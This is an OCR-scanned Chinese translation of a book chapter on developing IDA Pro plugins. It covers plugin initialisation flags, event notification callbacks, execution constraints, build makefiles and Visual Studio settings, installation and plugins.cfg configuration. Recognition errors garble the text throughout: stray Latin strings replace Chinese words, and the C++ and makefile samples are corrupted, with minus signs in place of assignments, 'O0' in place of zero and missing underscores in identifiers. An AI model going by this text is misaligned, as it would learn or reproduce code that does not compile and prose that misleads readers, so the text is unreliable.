插件 分 两 个 阶段 初始 化 ,插件 的 静态 初始 化 发 生 在 编译 时 ,而 动态 初始 化 则 在 加 载 时 通过 在 
PLUGIN.init 中 执行 的 操作 来 完成 。 如 前 所 述 ，PLUGIN. flags 字段 (在 编译 时 初始 化 ) 规定 了 插 
件 的 几 个 行为 。 

在 IDA 启动 时 ， 它 会 检查 <IDADIR>/plugins 目录 中 每 个 插件 的 PLUGIN.flags FEto IDA 为 
每 个 指定 了 PLUGIN FIX 标志 的 插件 调用 PLUGIN.init 函数 ,PLUGIN FIX 插件 在 任何 其 他 IDA 模块 
之 前 加 载 ， 因 此 ， 它 们 有 机 会 获知 IDA 能 生成 的 任何 事件 ， 包 括 由 加 载 器 模块 和 处 理 需 模块 生 
成 的 通知 。 一般 而 言 ， 这 些 插件 的 PLUGIN. init 函数 应 返回 PLUGIN OK 或 PLUGIN _ KEEP， 因为 如 果 
要 PLUGIN. init 返回 PLUGIN SKIP， 那么 在 IDA 启动 时 请 求 加 载 这 些 插 件 就 没有 任何 意义 。 

但 是 ， 如 果 搬 件 用 于 在 DA 启动 时 执行 一 次 性 的 初始 化 任务 ， 你 可 以 考虑 在 插件 的 init PR 
数 中 执行 这 个 任务 ， 并 返回 PLUGIN SKIP， 指 出 你 不 再 需要 这 个 插件 。 

每 次 加 载 一 个 处 理 需 模块 时 ，IDA 将 对 每 一 个 可 用 的 插件 进行 PLUGIN_PROC 标志 取样 ， 并 为 
每 一 个 设置 PLUGIN PROC 标志 的 插件 调用 PLUGIN. inito PLUGIN PROC 标志 允许 将 要 加 载 的 插件 响 
应 处 理 冀 模块 生成 的 通知 ， 从 而 补充 这 些 模块 的 行为 。 这 些 模 块 的 PLUGIN. init 函数 可 以 访问 全 
局 processor. tog ph, 检查 这 个 对 象 ， 并 根据 检查 结 采 决定 应 忽略 还 是 保留 插件 。 例 如 ， 如 琳 
IDA 加 载 的 是 x86 处 理 器 模块 ， 则 专门 供 MIPS 处 理 右 模块 使 用 的 插件 可 能 会 返回 PLUGIN SKIP, 
如 下 所 示 : 









































int idaapi mips init() { 
if (ph.id != PLFM MIPS) return PLUGIN SKIP; 
else return PLUGIN OK; //or, alternatively PLUGIN KEEP 
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最 后 , 每 次 加 载 或 创建 一 个 数据 库 时 , IDA 都 调用 每 个 尚未 加 载 的 插件 的 PLUGIN. init 函数 ， 
以 确定 是 否 应 加 载 这 些 插件 。 这 时 ， 每 个 插件 可 能 会 使 用 许多 标准 来 决定 IDA 是 否 应 保留 自己 。 
如 果 插 件 提供 特定 于 某 些 文件 类 型 (ELF, PE, Mach-O 等 )、 处 理 器 类 型 或 编译 器 类 型 的 行为 ， 
这 些 插件 即 属于 专用 插件 。 

无 论 出 于 什么 原因 ， 如 果 一 个 插件 决定 返回 PLUGIN OK (sk PLUGIN KEEP )， 则 PLUGIN. init ep 
数 还 应 执行 一 次 性 初始 化 操作 ， 以 确保 插件 在 最 初 被 激活 时 能 够 正常 运行 。PLUGIN. init 请 求 的 
任何 资源 都 应 在 PLUGIN.term 中 释放 。PLUGIN OK- PLUGIN KEEP 的 一 个 主要 不 同 在 于 ,PLUGIN KEEP 
可 防止 一 个 插件 被 反复 加 载 和 番 载 ， 因 而 不 必 像 一 个 指定 了 PLUGIN OK 的 插件 那样 ， 需 要 分 配 、 
释放 和 重新 分 配 资源 。 作 为 一 条 通用 原则 , 如果 将 来 对 插件 的 调用 取决 于 之 前 调用 插件 过 程 中 积 
BAIARA, PLUGIN. init 应 返回 PLUGIN KEEP。 为 了 避免 这 种 情况 ,插件 可 以 使 用 诸如 网 络 市 点 之 
类 的 永久 存储 机 制 ， 将 状态 信息 存储 在 打开 的 IDA 数据 库 中 。 使 用 这 种 技巧 ， 随 后 的 插件 调用 
就 可 以 定位 和 利用 早期 的 插件 调用 存储 的 数据 。 这 种 方法 具有 很 大 的 优点 , 它 可 以 为 整个 插件 调 
用 过 程 乃 至 所 有 IDA 会 话 提供 永久 性 存储 。 

对 于 插件 而 言 ， 如 果 每 次 调用 都 与 前 一 次 调用 无 关 ，PLUGIN. init 通常 会 返回 PLUGIN OK. iX 
样 ， 由 于 加 载 到 内 存 中 的 插件 更 少 ，IDA 的 内 存 占用 也 更 少 。 


17.1.3 ”事件 通知 


用 户 经 常 通过 菜单 选择 (Edit » Plugins ) 或 热 键 直接 激活 插件 ,不 过 DA 的 事件 通知 功能 提 
供 了 另 一 种 激活 插件 的 方法 。 

如 果 和 希望 插件 知道 IDA 中 发 生 的 某 事件 ， 你 必须 注册 一 个 回调 函数 ， 对 这 类 事件 表示 兴趣 。 
hook to notification point 因数 用 于 告诉 IDA 你 对 某 类 事件 感 兴趣 , 并 且 每 次 在 指定 的 类 中 发 
生 这 类 事件 时 ，IDA 应 调用 该 函数 。 使 用 hook to notification point 函数 对 数据 库 事件 表示 兴 
趣 的 例子 如 下 所 示 : 















































//typedef for event hooking callback functions (from loader.hpp) 
typedef int idaapi hook cb t(void *user data, int notification code, va list va); 
//prototype for hook to notification point (from loader.hpp) 
bool hook to notification point(hook type t hook type, 
hook cb t *callback, 
void *user data); 
int idaapi idabook plugin init() { 
//Example call to hook to notification point 
hook to notification point(HT IDB, idabook database cb, NULL); 


j 


通知 共 分 为 4 大 类 : 处 理 需 通知 〈ida.hpp 中 的 idp_nofity，HT_IDP )、 用 户 界 面 通知 
( kernwin.hpp 中 的 ui notification 上 ，HT_UI )、 调 试 器 事件 (dbg.hpp 中 的 dbg notification, 
HT_DBG ) 和 数据 库 事 件 ( idp.hpp 中 的 idp_event_t, HT_IDB ), 在 每 一 类 事件 中 ,都 有 大 量 通 知 代 
码 用 来 表示 你 将 会 收 到 通知 的 特定 事件 。 数 据 库 《HT_IDB ) 通知 的 例子 包括 idb_event: :byte_ 
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patched， 它 指出 一 个 数据 库 字 节 已 被 修补 ; 还 包括 idb_event::cmt_changed， 它 指出 一 个 常规 
注释 或 可 重复 注释 已 被 修改 。 每 次 发 生 事件 时 ，IDA 都 会 调用 你 注册 的 回调 函数 ,传递 特定 的 事 
件 通 知 代码 和 特定 于 该 通知 代码 的 其 他 参数 。 定 义 每 段 通知 代码 的 SOK 头 文件 详细 说 明了 向 
段 通知 代码 提供 的 参数 。 

继续 前 面 的 例子 ,我们 可 以 定义 一 个 回调 函数 处理 数据 库 事 件 ， 如 下 所 示 : 


int idabook database cb(void *user data, int notification code, va list va) { 
ea t addr; 
ulong original, current; 
switch (notification code) { 
case idb event::byte patched: 
© addr = va arg(va, ea t); 
current - get byte(addr); 
original - get original byte(addr); 
msg(" 4x was patched to Xx. Original value was %x\n", 
addr, current, original); 
break; 








j 


return O0; 


j 


这 个 特殊 的 例子 仅 识 别 byte patched MANAR, E TTEDBSEIE T D B)RUBE. TA AME 
以 及 该 字 节 的 初始 值 。 通知 回调 函数 利用 C++ 可 变 参 数列 表 va list, 根据 上 自己 收 到 的 通知 代码 ， 
访问 一 组 数量 可 变 的 参数 ,定义 每 一 段 通知 代码 的 头 文件 指定 了 为 每 一 段 通知 代码 提供 的 参数 的 
数量 和 类 型 。byte patched 通知 代码 在 loaderhpp 文件 中 定义 ， 接 收 它 的 va list 中 的 一 个 ea t 
类 型 的 参数 。C++ va arg 宏 可 用 于 从 va list 中 检索 连续 的 参数 。 在 前 面 的 例子 中 ， 被 修补 的 字 
节 的 地 址 从 @@ 处 的 va list 中 检索 出 来 。 

下 面 是 对 数据 库 通 知事 件 解 除 挂 钓 的 一 个 例子 : 


void idaapi idabook plugin term() { 
unhook from notification point(HT IDB, idabook database cb, NULL); 
} 


只 要 凶 载 了 功能 正常 的 插件 ， 就 应 解除 它 与 任何 通知 之 间 的 挂 钓 。 这 也 是 PLUGIN. term 函数 
的 作用 之 一 。 如 采 未 能 对 所 有 活动 的 通知 解除 挂钩 ， 几 乎 可 以 肯定 ，IDA 会 在 你 的 插件 凶 载 后 不 
AA BOR o 


17.1.4 插件 执行 


迄今 为 止 ， 我 们 已 经 讨论 了 几 个 实例 ， 说 明 IDA 如 何 调用 属于 某 插件 的 函数 。 插 件 加 载 和 
印 载 操作 分 别 需 要 调用 PLUGIN. init 和 PLUGIN. term 函数 。 用 户 通 过 Edit » Plugins 菜单 或 与 插件 
关联 的 热 键 激活 插件 后 ，IDA 将 调用 PLUGIN. run 函数 。 最 后 ， 你 可 能 需要 调用 插件 注册 的 回调 
ër. Dm IDA 中 发 生 的 各 种 事件 。 
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无 论 以 何 种 方式 执行 插件 ， 必 须 记 住 几 个 重要 的 事实 。 插 件 函数 从 IDA 的 主要 事件 处 理 循环 
中 调用 。 如 果 插 件 正在 执行 ，IDA 将 无 法 处 理事 件 ， 包 括 已 排序 的 分 析 任务 和 用 户 界 面 更 新 。 因 
此 ， 你 的 插件 必须 尽 可 能 迅速 地 执行 它 的 任务 ， 然 后 将 控制 权 返 还 给 IDA; (ll, IDA 将 完全 无 
法 响应 ， 也 就 没有 办 法 重新 获得 控制 权 。 换 句 话说， 一 旦 搬 件 开始 执行 ， 你 就 很 难 让 它 中 断 。 你 
要 么 等 待 搬 件 完成 执行 ， 要 么 终止 IDA 进程 。 在 后 一 种 情况 下 ， 你 可 能 已 经 打开 了 一 个 数据 库 ， 
该 数据 库 可 能 会 受到 破坏 ， 而 IDA 却 不 一 定 能 修复 。SDK 提供 了 3 种 吨 数 帮助 你 解决 这 个 问题 。 
可 以 调用 show wait box 函数 显示 一 个 对 话 框 ， 其 中 显示 消息 “Please wait...” 以 及 一 个 Cancel 按 
钮 。 你 可 以 调用 wasBreak KXT, 定期 验证 用 户 是 否 单 击 了 Cancel 按钮 。 使 用 这 种 方法 的 好 处 在 于 ， 
— H wasBreak 被 调用 ，IDA 将 利用 这 个 机 会 更 新 用 户 界 面 ， 你 的 插件 也 有 机 会 决定 是 否 终 止 它 所 
执行 的 操作 。 无 论 如 何 ， 你 必须 调用 hide wait box 从 窗口 中 移 除 等 待 对 话 框 。 

请 不 要 尝试 对 插件 进行 任何 创新 ， 不 要 让 PLUGIN.run 函数 创建 一 个 新 的 线程 来 处 理 插 件 所 
执行 的 任务 。IDA 不 是 一 个 线程 安全 的 应 用 程序 。 它 没有 锁定 机 制 来 同步 对 IDA 使 用 的 许多 全 
局 变量 的 访问 ， 也 没有 任何 锁定 机 制 来 确保 数据 库 事 务 的 “原子 性 ”。 换 言 之 ， 如 果 你 确实 创建 
了 一 个 新 的 线程 ， 并 且 使 用 SDK 因数 通过 该 线程 修改 了 数据 库 ， 那 么 你 可 能 会 破坏 数据 库 。 因 
为 这 时 IDA 可 能 正在 修改 数据 库 ， 这 一 操作 将 与 你 要 做 的 修改 产生 冲突 。 

请 记 住 这 些 限制 。 对 多 数 择 件 而 言 ， 由 插件 完成 的 大 部 分 工作 将 在 PLUGIN.run 中 执行 。 基 
于 我 们 前 面 初始 化 的 PLUGIN 对 象 ，PLUGIN. run 的 最 短 (也 令 人 乏味 ) 实现 代码 如 下 所 示 : 


void idaapi idabook plugin run(int arg) { 
msg("idabook plugin activated!\n"); 






































每 个 插件 都 拥有 供 其 使 用 的 C++ 和 IDA API 将 插件 与 特定 于 平台 的 库 链接 起 来 ， 你 还 可 以 
实现 其 他 功能 。 例 如 ， 为 Windows 版 本 的 IDA 开发 的 插件 可 以 使 用 全 部 的 Windows API。 如 有 果 
除了 在 消息 窗口 中 打印 一 条 消息 外 ,还 想 实 现 更 加 复杂 的 功能 , 你 需要 了 人 解 如 何 利 用 可 用 的 IDA 
SDK 也 数 来 完成 任务 。 例 如 ， 利 用 代码 清单 16-6 可 以 开发 出 以 下 后 数 : 


void idaapi extended plugin run(int arg) { 
func t *func = get func(get screen ea()); //get function at cursor location 
msg("Local variable size is %d\n", func->frsize); 
msg("Saved regs size is %d\n", func-»frregs); 
struc t *frame - get frame(func); //get pointer to stack frame 
if (frame) { 
size t ret addr = func-»frsize + func-»frregs;  //offset to return address 
for (size t m = 0; m < frame-»memqty; m++) 1 //loop through members 
char fname[1024]; 
get member name(frame-»members[m].id, fname, sizeof(fname)); 
if (frame-»members[m].soff < func-»frsize) { 
msg("Local variable "); 


else if (frame-»members[m].soff > ret addr) { 
msg("Parameter "); 


msg("%s is at frame offset %x\n", fname, frame-»members[m].soff); 
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if (frame-»members[m].soff -- ret addr) { 
msg("%s is the saved return address Wn", fname); 


} 
} 
} 


使 用 这 个 函数 ,现在 我 们 有 了 插件 的 核心 组 件 , 每 次 你 激活 这 个 插件 时 , 它 将 存储 与 当前 选 
AE FS] PRU DERI UU E o 


17.2 ”构建 插件 


在 Windows RE, ff EXE XXI] DLL 文件 (使 用 .plw 或 .p64 扩展 名 ); MÆ Linux 和 Mac 
系统 上 ， 插 件 是 有 效 的 共享 对 象 文件 (分别 使 用 .plx/.plx64、.pmc/.pmc64 扩展 名 )。 构 建 插件 可 
能 是 一 个 非 背 烦琐 的 任务 , 因为 你 必须 正确 配置 所 有 构建 设置 , 否则 , 构建 过 程 极 有 可 能 会 失败 。 
SDK 中 包含 有 大 量 样本 插件 ， 每 个 样本 插件 都 有 它 上 自己 的 生成 文件 。 这 些 生成 文件 全 部 使 用 
Windows 系统 上 的 Borland 构建 工具 创建 而 成 。 因 此 ， 如 果 你 和 希望 使 用 不 同 的 工具 ， 或 在 不 同 的 
平台 上 构建 生成 文件 ， 你 可 能 会 面临 一 些 挑 战 。SDK EH install xxx.txt 文件 介绍 了 如 何 通 过 
GUN make 和 gcc, 使 用 <SDKDIR>/bin/idamake.pl 构 建 插 件 。idamake.pl 文件 用 于 从 Borland 风格 
的 生成 文件 生成 一 个 GNU make 风格 的 生成 文件 ， 然 后 调用 GNU make 构建 插件 。 

要 构建 插件 ， 我 们 的 首选 是 使 用 简化 版 本 的 生成 文件 和 GNU 工具 (通过 Windows 上 的 
MinGW )。 你 可 以 将 代码 清单 17-1 中 的 简化 版 本 的 生成 文件 直接 应 用 到 你 的 插件 项 目 中 。 


代码 清单 17-1 创建 IDA 插 件 的 一 个 样本 生成 文件 
Bet this variable to point to your SDK directory 
IDA SDK-../../ 

















PLATFORM-$(shell uname | cut -f 1 -d ) 


ifneq "$(PLATFORM)" "MINGW32" 
IDA-$ (HOME) / ida 
endif 


#Set this variable to the desired name of your compiled plugin 
PROC-idabook plugin 


ifeq "$(PLATFORM)" "MINGW32" 

PLATFORM CFLAGS--D NT D IDP  -DWIN32 -Os -fno-rtti 

PLATFORM LDFLAGS--shared -s 

LIBDIR-$(shell find ../../ -type d | grep -E "(lib|lib/)gcc.w32") 
ifeq ($(strip $(LIBDIR)),) 

LIBDIR-../../lib/x86 win gcc 32 

endif 

IDALIB-$(LIBDIR)/ida.a 

PLUGIN EXT-.plw 


17.2 


else ifeq "$(PLATFORM)" "Linux" 
PLATFORM CFLAGS--D LINUX ` 
PLATFORM LDFLAGS--shared -s 
IDALIB--lida 

IDADIR--L$(IDA) 

PLUGIN EXT-.plx 


else ifeq "S(PLATFORM)" "Darwin" 
PLATFORM CFLAGS--D MAC ` 

PLATFORM LDFLAGS--dynamiclib 
IDALIB--lida 
IDADIR--L$(IDA)/idaq.app/Contents/MacOs 
PLUGIN EXT-.pmc 

endif 


Platform specific compiler flags 
CFLAGS--Wextra -0s $(PLATFORM CFLAGS) 


#Platform specific ld flags 
LDFLAGS-$(PLATFORM LDFLAGS) 


specify any additional libraries that you may need 
EXTRALIBS- 


# Destination directory for compiled plugins 
OUTDIR-$(IDA SDK)bin/plugins/ 


#list out the object files in your project here 
0BJS-idabook plugin.o 


BINARY-$(OUTDIR)$(PROC)$(PLUGIN EXT) 
all: $(OUTDIR) $(BINARY) 
Clean: 

-Qrm *.o 


-Qrm $(BINARY) 


$(0UTDIR) : 
-Qmkdir -p $(OUTDIR) 


CC=g++ 
INC--I$(IDA SDK)include/ 


4.0: ^.Cpp 
$(CC) -c $(CFLAGS) $(INC) $< -o $0 


LD=g++ 


$(BINARY): $(0BJS) 
$(LD) $(LDFLAGS) -o $@ $(0BJS) $(IDADIR) $(IDALIB) $(EXTRALIBS) 


构建 插件 


S 
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#change idabook plugin below to the name of your plugin, make sure to add any 
Hadditional files that your plugin is dependent on 
idabook plugin.o: idabook plugin.cpp 


前 面 的 生成 文件 使 用 uname 命令 确定 运行 平台 并 相应 地 配置 一 些 构建 标志 。 通过 将 相关 对 象 
文件 的 名 称 附加 到 $0BJS 变量 的 后 面 及 生成 文件 的 来 尾 ， 你 可 以 回 揪 件 项 目 添加 其 他 源 文件 。 如 
有 果 你 的 插件 需要 其 他 库 ， 你 应 在 $EXTRALIBS 中 指定 库 名 称 。$IDA_SDK 变量 用 于 指定 <SDKDIR> 的 
位 置 ， 它 可 以 使 用 绝对 或 相对 路 径 。 在 这 个 例子 中 ，$IDA_SDK 使 用 的 是 一 个 相对 路 径 ， 表 示 
<SDKDIR> 比 插件 目录 高 两 个 目录 。 这 是 为 了 与 <SDKDIR>/plugins( 本 例 中 为 <SDKDIR>/plugins/ 
idabook plugin ) 中 的 插件 项 目 保 持 一 致 。 如 果 选 择 将 搬 件 项 目 目录 放置 在 相对 于 <SDKDIR> 的 其 
他 位 置 ， 必 须 确保 $IDA SDK 正确 引用 <SDKDIR>。 最 后 ， 前 面 例子 的 配置 可 以 将 已 编译 的 插件 成 
功 地 存储 在 <SDKDIR>/bin/plugins 目录 中 。 需 要 记 住 的 是 , 成 功 编译 一 个 插件 并 不 一 定 会 安装 这 
个 插件 。 我 们 将 在 下 一 节 中 讨论 插件 安装 。 

install visual.txt 文件 讨论 了 如 何 使 用 微软 的 Visual C++ Express 构建 IDA 模块 ,要 使 用 Visual 
Studio 2008 从 雪 开 始 创 建 一 个 项 目 ， 请 执行 以 下 步骤 。 

(1) 选择 File » New > Project 打开 New Project 对 话 杠 ， 如 图 17-1 所 示 。 




















New Project .2| 区 | 
Project types: Templates: Luwer Framework 3.5 -| 88 E 
Visual C++ Visual Studio installed templates 
ATL 
CLR m Win32 Consol: Application 
General WIn32 Project 
MFC la 
Smart Device My Templates 
Test Search Online Templates... 


Win32 


Other Languages 
Other Project Types 
Test Projects 


| A project for creating a Win32 application, console application, DLL, or static library 
Name: | idabook plugin 


Location: | C: dasdkeO plugins "| Browse... | 
Solution Name: | idabook_plugin [V Create directory for solution 


L oe | va | 





图 17-1 Visual Studio“ 新 建 项 目 ” 对 话 框 


(2) 指定 项 目 类 型 为 Visual C++/Win32， 选 择 Win32 Project 模板 ， 并 为 你 的 项 目 提 供 名 称 和 
存储 位 置 。 通 常 ， 你 会 将 新 建 的 插件 项 目 保存 在 <SDKDIR>/plugins 目录 中 ， 以 将 所 有 的 插件 保 
存在 同一 个 位 置 。 单 击 OK 按钮 后 ，Win32 Application Wizard ( Win32 应 用 程序 回 导 ) 出 现 。 单 
击 Next 按 钮 进入 Application Setting 步 又 ,然后 将 Application type 设 置 为 DLL ,将 Additional options 
设置 为 Empty project， 在 单 击 Finish 按钮 之 前 ， 界 面 如 图 17-2 所 示 。 

(3) 建立 项 目的 基本 框架 后 ,必须 进行 其 他 一 些 设置 .通过 Project > Properties 可 打开 如 图 17-3 
所 示 的 对 话 框 ,并 可 访问 Visual Studio 2008 中 的 项 目 属性 。 只 有 你 增加 或 编辑 一 个 新 文件 ， 或 增 
加 一 个 现 有 文件 ， 将 一 个 源 文件 添加 到 项 目 中 ，C/C++ 配 置 选项 才 会 生效 。 
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Win32 Application Wizard - idabook plugin 


Application Settings 


Overview Application type: 
C Windows application 
(^ Console application 
(* DUL 
C Static library 
Additional options: 
Iv. Empty project 
[^ Export symbols 
JV. precompiled header. 


Application Settings 





< Previous | Next> | Finish | Cancel | 


图 17-2 Visual Studio Win32 应 用 程序 向 导 











idabook plugin Property Pages | 71xl 
Configuration: P Configurations 了 | Platform: [Active(wins2) Di Configuration Manager = 


Common Properties Additional Indude Directories C: idasdk60 ndude 
Configuration Properties Resolve stusing References 
General Debug Information Format 
Debugging Suppress Startup Banner Yes (/nologo) 
C/C++ Warning Level Level 3 (/W3) 
General Detect 64-bit Portability Issues No 
Optimization Treat Warnings As Errors No 


PE Use UNICODE Response Files Yes 
Code Generation 


Language 
Precompiled Headers 
Output Files 
Browse Information 
Advanced 
Command Line 
Linker 
Manifest Tool 
XML Document Generator 
Browse Information 
Build Events 
Custom Build Step 


Additional Include Directories 


Specifies one or more directories to add to the indude path; use semi-colon delimited list if more than one. 
(1[path]) 





图 17-3 Visual Studio“ 项 目 属性 ”对 话 框 


需要 修改 的 设置 分 布 在 对 话 框 左 侧 的 Configuration Properties ( 配置 属性 ) 部 分 。 在 完成 
项 目的 过 程 中 , 设置 属性 的 方式 如 图 17-3 所 示 。 对 于 你 在 对 话 框 左 侧 选择 的 每 一 类 属性 , 对话 
框 右 侧 都 会 显示 一 个 可 配置 的 属性 列表 。 注 意 ， 属 性 类 别 分 层 显 示 。 你 可 以 通过 文件 选择 "mm 
行 编 辑 、 多 行 编辑 或 下 拉 列 表 选 择 来 编辑 属性 。 表 17-1 详细 说 明了 创建 插件 项 目 时 必须 编辑 的 
属性 。 
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X 17-1 Visual Studio 插件 配置 值 (32 位 ) 








配置 属性 类 别 特定 的 属性 属 性 值 
常规 输出 目录 根据 需要 ， 通 常 为 <SDKDIR>\bin\plugins 
C/C++ 和 常规 其 他 包含 目录 添加 <SDKDIR>\include 
C/C++》 预 处 理 器 预 处 理 器 定义 附加 “; NT ; IDP " 
C/C++ » 代码 生成 运行 库 多 线程 〈 发 行 版 ) ° 


多 线程 调试 (调试 版 ) 
( 非 DLL 版本)?* 


链接 器 常规 ai CT 更 改 扩展 名 为 .plw 
链接 器 常规 其 他 库 目 录 添加 <SDKDIR>Nib\x86 win vc 32* 
链接 器 输入 其 他 依赖 关系 添加 ida.lib ( 取 自 \lib\86 win vc 32) 
ERZAR P 命令 行 其 他 选项 添加 /EXPORT:PLUGIN 
a 这 里 的 多 线程 指 C++ 运行 库 本 身 。IDA 碰巧 是 一 个 利用 这 个 库 的 单线 程 应 用 程序 。 单 线程 版 本 的 C++ 运行 库 并 


不 存在 。 

b 选择 DLL 版 本 的 C++ 库 要 求 插 件 最 终 运 行 的 系统 中 包含 MSVCRSO.DLL 文件 。 为 了 消除 这 种 限制 ， 可 选择 非 
DLL 版 本 的 C++ 运行 库 ， 它 生成 一 个 更 加 便携 的 静态 链接 插件 。 

c 在 SDK6.1 之 前 ， 添 加 库 目录 <SDKDIR>Nlib\vvc.w32。 


值得 注意 的 是 ， 在 Visual Studio 中 ， 你 可 以 分 别 为 项 目的 调试 和 发 行 版 本 指定 配置 选项 ( 见 
图 17-3 左上 角 )。 如 果 要 为 捅 件 构 建 独立 的 调试 和 发 行 版 本 ,请 确保 修改 两 种 配置 中 的 属性 。 田 
外 ， 从 Configurations 下 拉 列 表 ( Properties 对 话 框 的 左上 角 ) 中 选择 All Configurations， 可 以 为 
你 节省 一 些 时 间 ， 因 为 这 时 你 对 属性 所 做 的 修改 将 应 用 于 所 有 构建 配置 。 


17.3 插件 安装 


和 构建 插件 相 比 ， 安 装 插件 非常 简单 。 要 安装 插件 ， 你 只 需 将 已 编译 的 插件 模块 复制 到 
<IDADIR>/plugins 日 录 中 。 需 要 注意 的 是 ， 在 Windows 系统 中 不 能 和 窗 写 一 个 正在 使 用 的 可 执行 
文件 。 因 此 , 要 在 Windows 系统 中 安装 一 个 插件 ,你 必须 确保 从 DA 中 缀 载 任何 旧版 本 的 插件 。 
根据 插件 的 加 载 选 项 ， 插 件 可 能 会 在 数据 库 关 闭 时 伸 载 。 但 是 ， 对 于 已 经 设置 PLUGIN FIX 标志 
的 插件 ， 你 可 能 需要 完全 关闭 IDA 才能 将 新 插件 复制 到 <IDADIR>/plugins 目录 中 。 

在 Linux 和 OSX 系统 上 ， 你 可 以 在 使 用 可 执行 文件 时 窗 写 它们 ， 因 此 ， 在 安 疙 一 个 新 版 本 
的 插件 时 ， 你 不 需要 件 载 这 个 插件 。 但 是 ,在 DA 下 一 次 加 载 插 件 之 前 ， 新 版 本 的 插件 不 会 加 
载 到 IDA 中 。 

一 些 IDA 插件 仅 以 二 进 制 形式 发 布 ， 而 其 他 插件 则 同时 以 源 代 码 和 二 进 制 格式 发 布 。 要 安 
KAKE, 你 通常 需要 找到 适合 你 的 IDA 版 本 的 已 编译 插件 , 并 将 它 复 制 到 <IDADIR>/plugins 
目录 中 。 在 安装 插件 之 前 ， 请 一 定 阅读 你 希望 安 半 的 插件 附 币 的 文档 资料 ( 如 果 有 )， 因 为 有 一 
些 插件 需要 你 安装 其 他 组 件 才 能 正常 运行 。 
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17.4 插件 配置 


通过 <IDADIR>/plugins/plugins.cfg 文件 中 的 设置 ，IDA 可 以 对 插件 进行 有 限 的 配置 。 
plugins.cfg 中 的 设置 可 用 于 指定 与 插件 有 关 的 以 下 信息 。 

O 插件 的 一 个 备 选 亲 单 说明 。 这 个 值 重 写 插件 的 wanted name 数据 成 员 。 

口 插件 的 一 个 非 标 准 存储 位 置 或 文件 扩展 名 。 默 认 情 况 下 ，IDA 在 <IDADIR>/plugins 目录 
中 搜索 插件 ， 并 期 竺 插件 拥有 一 个 默认 的 、 特 定 于 平台 的 文件 扩展 名 。 

D 一 个 用 于 激活 插件 的 备 选 的 或 额外 的 热 键 。 这 个 值 重 写 插件 的 wanted hotkey 数据 成 员 。 

a 一 个 整数 值 。 每 次 激活 插件 时 ， 回 插件 的 PLUGIN. run 靖 数 传递 这 个 值 。 

a 一 个 供 调试 器 插件 使 用 的 可 选 DEBUG 标志 。 第 24 章 将 讨论 调试 器 插件 。 

插件 配置 行 的 有 效 语法 在 plugins.cfg 文件 中 描述 。 下 面 是 插件 配置 行 的 几 个 例子 : 











; Semicolons introduce comments. A plugin configuration line consists 
; of three required components and two optional components 

; plugin name plugin file hotkey [integer run arg] [DEBUG] 

The IdaBook Plugin ` idabook plugin Alt-F2 1 

IdaBook Plugin Alt — idabook plugin ^ Alt-F3 2 


插件 作者 为 插件 选择 wanted name 和 wanted hotkey 数据 成 员 ， 并 将 它们 编译 到 插件 中 。 两 
个 由 不 同 作 者 开发 的 插件 极 有 可 能 使 用 完全 相同 的 名 称 或 热 键 。 在 plugins.cfg 文件 中 ， 
plugin name 字段 (CT  PLUGIN.wanted name ) 指定 添加 到 Edit > Plugins 菜单 中 的 文本 。 你 可 
以 给 一 个 插件 分 配 几 个 名 称 , 因 而 要 分 配 儿 个 荣 单 项 。 在 将 名 称 谎 加 到 Edit > Plugins 来 单 中 之 前 ， 
plugin name 字段 中 的 下 划 线 字符 将 被 空格 字符 替换 。 

plugin file 字段 指定 已 编译 插件 模块 文件 的 名 称 ， 当 前 的 配置 行 即 应 用 于 这 个 文件 。 如 果 
指定 一 个 完整 路 径 ，IDA 将 从 指定 的 路 径 加 载 这 个 插件 。 如 果 没 有 指定 路 径 ，IDA 将 在 
<IDADIR>/plugins 目录 中 寻找 插件 。 如 果 没 有 指定 扩展 名 ， 则 DA 会 假定 插件 使 用 当前 平台 的 
默认 扩展 名 。 如 果 指 定 扩展 名 ， 则 IDA 会 搜索 与 插件 文件 名 完全 匹配 的 插件 。 

hotkey 字段 指定 激活 插件 应 使 用 的 热 键 。 这 个 字段 重 写 PLUGIN.wanted_hotkey， 可 用 于 解决 
两 个 插件 使 用 同一 个 激活 热 键 所 造成 的 热 键 分 配 冲 突 。 另 外 ,给 一 个 插件 分 配 几 个 热 键 时 ， 你 能 
以 多 种 方式 激活 这 个 插件 。 这 时 ， 可 以 根据 激活 插件 所 使 用 的 热 键 ， 为 PLUGIN. run 指定 儿 个 独 
特 的 整数 参数 。 当 你 癌 PLUGIN.run 提交 不 同 的 整数 值 时 ，IDA 可 以 让 插件 决定 到 底 如 何 激 活 日 
己 。 如 果 一 个 插件 实施 好 几 种 行为 ， 且 根据 插件 被 激活 的 方式 选择 行为 ， 就 可 以 用 到 上 述 功能 。 
在 前 面 的 配置 示例 中 ， 只 要 插件 通过 ALT+F3 热 键 组 合 激活 ，IDA 就 向 idabook plugin 的 
PLUGIN. run 函数 提交 整数 值 2。 


























17.5 扩展 IDC 
到 现在 为 止 , 我 们 已 经 介绍 了 主要 用 于 操纵 数据 库 或 从 数据 库 中 提取 信息 的 插件 。 本 节 将 提 
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供 一 个 扩展 DC 脚本 语言 功能 "的 例子 。 如 第 16 章 所 述 , IDC 在 IDA API 的 基础 上 运行 , 因此 毫 
不 奇怪 ， 必 要 时 我 们 可 以 使 用 API 来 增强 IDC 的 功能 。 

在 第 15 EME 16 草 中 ， 你 了 解 到 ，IDC 全 局 数组 实际 上 是 一 个 功能 有 限 的 网 络 节点 。 我 们 
提 到 , TE IDC 中 ， 你 可 以 通过 提供 一 个 名 称 而 收 到 一 个 数组 ID ， 从 而 创建 全 局 数组 。 在 IDC 内 
部 ， 你 提供 的 名 称 获得 字符 串 前 级 “$ idc_array”， 你 收 到 的 数组 ID 实际 上 是 一 个 网 络 节 点 索 
引 值 。 如 何 扩 展 IDC 以 访问 IDA 数据 库 中 的 网 络 节 点 呢 ? 通过 将 索引 作为 IDC 中 的 数组 ID, 我 
们 已 经 能 够 访问 已 知 索 引 的 任何 网 络 节点 。 因 此 , 我 们 只 需要 能 够 访问 已 知 其 名 称 的 网 络 市 点 就 
trí. Hi, IDA 阻止 我 们 这 样 做 ， 因 为 它 在 我 们 提供 的 每 一 个 网 络 市 点 名 称 前 加 上 了“$ 
idc_array” 前 级 。 要 解决 这 个 问题 ， 自 和 完 进入 SDK 和 set idc func ex 函数 。 

set idc func ex 因数 在 expr.hpp 中 定义 ， 可 用 于 创建 一 个 新 的 IDC 困 数 ， 并 将 它 的 行为 与 
C++ 实现 对 应 起 来 。set idc func ex 函数 的 原型 如 下 所 示 : 

















typedef error t (idaapi *idc func t)(idc value t *argv, idc value t *res); 
bool set idc func ex(const char *idc name, idc func t idc impl, 
